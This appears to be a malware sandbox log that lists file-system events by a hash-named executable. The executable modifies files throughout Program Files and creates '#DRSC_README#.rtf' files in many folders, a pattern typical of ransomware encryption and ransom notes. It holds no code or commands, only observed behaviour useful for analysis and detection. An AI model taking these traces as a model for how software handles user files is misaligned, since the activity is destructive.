710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.SYD 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\MakeAccessible.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Cocos 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\about.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Chita 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Makassar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Niue 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\bin\jp2launcher.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives_1.1.100.v20140523-0116.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\sa-jdi.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-api.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Fortaleza 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Journal\en-US\Journal.exe.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\blacklist 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javap.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Ndjamena 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\skins\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jsadebugd.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\about.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-heapdump.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\index.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Maceio 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Danmarkshavn 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Helsinki 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.sun.el_2.2.0.v201303151357.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nipigon 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Atikokan 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\smtp.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_fr.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveDrop32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_pt_BR.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.lng 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.change_2.10.0.v20140901-1043.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\EST5EDT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ja_JP.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Mendoza 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CET 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+10 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Samara 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\browser\VisualElements\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-7 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Hobart 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\offset_window.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome_pwa_launcher.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Accra 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jarsigner.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Miquelon 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Singapore 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_HK.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Guatemala 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\XmlFile.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\charsets.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Gaza 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ulaanbaatar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Tirane 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Windows Mail\wabmig.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\jabswitch.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedback.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\splash.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Tripoli 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fontconfig.properties.src 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\LockUninstall.asx 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\fonts\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yekaterinburg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.contexts_1.3.100.v20140407-1019.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.core_3.5.0.v20120725-1805.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvm.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\bin\java-rmi.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+5 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\AST4 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Extensions\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+2 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\core.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Eucla 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Efate 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-execution.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\pt-BR.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_ko.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\orb.idl 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\ResourceInternal.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240389.profile.gz 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kuching 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\jfxrt.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\browser\features\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiler.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Noronha 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Andorra 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Riga 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Chuuk 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-io.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\THIRDPARTYLICENSEREADME.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_globalstyle.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Matamoros 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\da.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.util.gui_1.7.0.v200903091627.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.clusters 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+3 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\javaws.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\LoginForm.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Moscow 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\cursors.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Tell_City 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\docs.crx 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-11 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Srednekolymsk 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Simferopol 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+11 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Rarotonga 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\tzmappings 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif 